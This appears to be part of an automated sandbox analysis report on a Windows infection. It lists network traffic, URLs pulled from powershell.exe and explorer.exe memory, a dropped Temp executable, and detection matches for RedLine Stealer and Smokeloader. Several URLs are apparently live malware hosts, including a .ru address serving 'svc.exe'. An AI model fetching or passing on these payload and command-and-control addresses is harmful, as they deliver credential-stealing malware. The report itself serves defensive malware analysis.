      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 04 Oct 2024 13:11:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 75 6e 69 63 65 78 70 65 72 74 6d 61 67 61 7a 69 6e 65 2e 70 77 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 7Content-Type: application/octet-streamDate: Fri, 04 Oct 2024 13:11:28 GMTData Raw: 03 00 00 00 7d 4f d6 Data Ascii: }O
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Fri, 04 Oct 2024 13:11:28 GMT
      Source: powershell.exe, 00000004.00000002.1555298135.0000023BDFDE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1555298135.0000023BE00B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1555298135.0000023BE00AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bestmagazineforanimalsunicum.ru
      Source: powershell.exe, 00000004.00000002.1555298135.0000023BDEA91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1555298135.0000023BDECBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bestmagazineforanimalsunicum.ru/download/svc.exe
      Source: explorer.exe, 00000009.00000003.2158371858.000000000D48C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158696563.000000000D0B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2159742625.000000000D0ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2704218980.000000000D494000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://biegpmdfbwuaocv.org/
      Source: explorer.exe, 00000009.00000003.2158371858.000000000D48C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2704218980.000000000D494000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://biegpmdfbwuaocv.org/hpup
      Source: explorer.exe, 00000009.00000000.1643693604.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2697965705.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2697965705.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1643693604.000000000952D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: explorer.exe, 00000009.00000003.2158371858.000000000D48C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ceoconstractionstore.pl/
      Source: explorer.exe, 00000009.00000003.2158371858.000000000D48C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2697713798.0000000008970000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158497917.000000000D4D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2705072858.000000000E0E0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2161005360.000000000D50E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ceoconstractionstore.pl/index.php
      Source: explorer.exe, 00000009.00000003.2158371858.000000000D48C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2704218980.000000000D494000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ceoconstractionstore.pl/index.php2
      Source: explorer.exe, 00000009.00000002.2705072858.000000000E0E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ceoconstractionstore.pl/index.phpq
      Source: powershell.exe, 00000004.00000002.1605660173.0000023BF6D53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
      Source: powershell.exe, 00000004.00000002.1601037332.0000023BF6A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
      Source: explorer.exe, 00000009.00000000.1643693604.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2697965705.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2697965705.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1643693604.000000000952D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: explorer.exe, 00000009.00000000.1643693604.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2697965705.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1643693604.0000000009519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2697965705.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2697965705.0000000009519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1643693604.000000000952D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: explorer.exe, 00000009.00000003.2158371858.000000000D48C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2704218980.000000000D494000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://dneagbdmtkktop.org/
      Source: explorer.exe, 00000009.00000003.2158371858.000000000D48C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2704218980.000000000D494000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://dneagbdmtkktop.org/Si
      Source: explorer.exe, 00000009.00000002.2704218980.000000000D494000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ebsdyhoseklppw.com/
      Source: explorer.exe, 00000009.00000003.2160838999.000000000D611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158231022.000000000D5DD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158577894.000000000D5E3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ebsdyhoseklppw.com/application/x-www-form-urlencodedMozilla/5.0
      Source: explorer.exe, 00000009.00000002.2704218980.000000000D617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2160776082.000000000D615000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158231022.000000000D5DD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158577894.000000000D5E3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://nqgjgifqepqt.com/
      Source: explorer.exe, 00000009.00000002.2704218980.000000000D617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2160776082.000000000D615000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158231022.000000000D5DD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158577894.000000000D5E3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://nqgjgifqepqt.com/application/x-www-form-urlencodedMozilla/5.0
      Source: powershell.exe, 00000004.00000002.1555298135.0000023BE0427000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594654043.0000023BEEB04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594654043.0000023BEEC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: explorer.exe, 00000009.00000000.1643693604.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2697965705.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2697965705.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1643693604.000000000952D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: explorer.exe, 00000009.00000000.1640285854.000000000305D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2693087527.000000000305D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
      Source: powershell.exe, 00000004.00000002.1555298135.0000023BDECBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: explorer.exe, 00000009.00000002.2696616097.0000000007B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1642682648.0000000007AF0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1640014437.0000000002C00000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: powershell.exe, 00000004.00000002.1555298135.0000023BDEA91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: explorer.exe, 00000009.00000003.2158371858.000000000D48C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158231022.000000000D5DD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158577894.000000000D5E3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://unicexpertmagazine.pw/
      Source: explorer.exe, 00000009.00000003.2158371858.000000000D48C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://unicexpertmagazine.pw/32
      Source: explorer.exe, 00000009.00000003.2158371858.000000000D48C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://unicexpertmagazine.pw/91-1
      Source: explorer.exe, 00000009.00000003.2158371858.000000000D48C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2704218980.000000000D494000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://unicexpertmagazine.pw/index.php
      Source: powershell.exe, 00000004.00000002.1555298135.0000023BDECBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: explorer.exe, 00000009.00000000.1641669934.00000000070CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158638981.00000000070D7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: explorer.exe, 00000009.00000002.2704218980.000000000D494000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://xcltdjfoaardilo.net/
      Source: explorer.exe, 00000009.00000002.2702499050.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2159742625.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158696563.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1646718148.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppin
      Source: powershell.exe, 00000004.00000002.1555298135.0000023BDEA91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: explorer.exe, 00000009.00000003.2159742625.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158696563.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1646718148.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000009.00000002.2697965705.00000000093B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1643693604.00000000093B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/$
      Source: explorer.exe, 00000009.00000002.2697965705.00000000093B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1643693604.00000000093B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/X
      Source: explorer.exe, 00000009.00000000.1639328782.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1640285854.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2691810923.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2693087527.0000000002FA0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000009.00000002.2697965705.00000000093B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1643693604.00000000093B4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=C2BB6DDCE8D847D6B779FE8AEC27D161&timeOut=5000&oc
      Source: explorer.exe, 00000009.00000000.1640285854.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2693087527.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: explorer.exe, 00000009.00000002.2697965705.0000000009390000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1643693604.0000000009390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comWzE
      Source: explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
      Source: explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
      Source: powershell.exe, 00000004.00000002.1594654043.0000023BEEC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000004.00000002.1594654043.0000023BEEC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000004.00000002.1594654043.0000023BEEC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: explorer.exe, 00000009.00000002.2702499050.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2159742625.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158696563.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1646718148.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comE
      Source: powershell.exe, 00000004.00000002.1555298135.0000023BDECBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000004.00000002.1555298135.0000023BDF6BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15G9PH.img
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hJkDs.img
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
      Source: powershell.exe, 00000004.00000002.1555298135.0000023BE0427000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594654043.0000023BEEB04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594654043.0000023BEEC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: explorer.exe, 00000009.00000002.2702499050.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2159742625.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158696563.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1646718148.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comNaP0B
      Source: explorer.exe, 00000009.00000002.2702499050.000000000CFF4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158696563.000000000D0B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1646718148.000000000CFF4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcemberZ
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000009.00000000.1644607896.0000000009730000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2699343946.0000000009730000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/bat
      Source: explorer.exe, 00000009.00000002.2702499050.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2159742625.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2158696563.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1646718148.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com576
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/wellness/7-secrets-to-a-happy-old-age-backed-by-science/ss-AA1hwpvW
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/legacy-park-auction-canceled-liquidation-proposed-here-s-w
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/one-dead-several-wounded-after-drive-by-shootings-in-south-la/a
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/opinion/decline-of-decorum-21-essential-manners-today-s-parents-fail-
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/california-workers-will-get-five-sick-days-instead-of-three-
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controv
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
      Source: explorer.exe, 00000009.00000002.2694950783.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1641669934.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: Yara matchFile source: 00000009.00000002.2697683211.0000000008821000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.1658821304.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.1658888908.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.1937588498.0000000002181000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.1937415520.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.2692065809.0000000000B21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: 0000000A.00000002.1937502143.00000000007ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000005.00000002.1659047327.000000000090D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000009.00000002.2697683211.0000000008821000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.1658821304.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.1658888908.00000000006D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.1658776261.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 0000000A.00000002.1937393700.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 0000000A.00000002.1937588498.0000000002181000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 0000000A.00000002.1937415520.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000009.00000002.2692065809.0000000000B21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\oBuf.exeJump to dropped file
      Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
